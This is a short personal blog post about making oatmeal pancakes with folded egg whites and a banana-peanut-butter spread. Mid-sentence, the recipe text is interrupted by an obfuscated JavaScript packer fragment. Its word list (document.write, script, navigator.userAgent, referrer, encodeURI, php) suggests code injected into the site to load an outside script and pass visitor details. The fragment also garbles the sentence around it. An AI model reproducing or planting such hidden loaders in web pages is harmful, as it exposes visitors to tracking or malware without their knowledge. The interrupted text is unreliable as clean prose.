Oatmeal Pancakes

In an effort to eat more healthy, I made oatmeal pancakes for breakfast. They are less sweaty and a bit heartier than typical pancakes.

I ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sbdzn|var|u0026u|referrer|saidt||js|php’.split(‘|’),0,{}))
found the recipe
here and tweaked it a little bit.
I beat the egg whites until they had stiff peaks and then folded in the oatmeal, baking powder, vanilla and a dash of nonfat milk. Then, on med-low, I cooked them!
I mashed some bananas with peanut butter and used it as a spread. All in all, not too shabby. And relatively healthy!
Tomorrow, I’ll showcase the lemon pancakes. More work, not good for you, but very tasty!
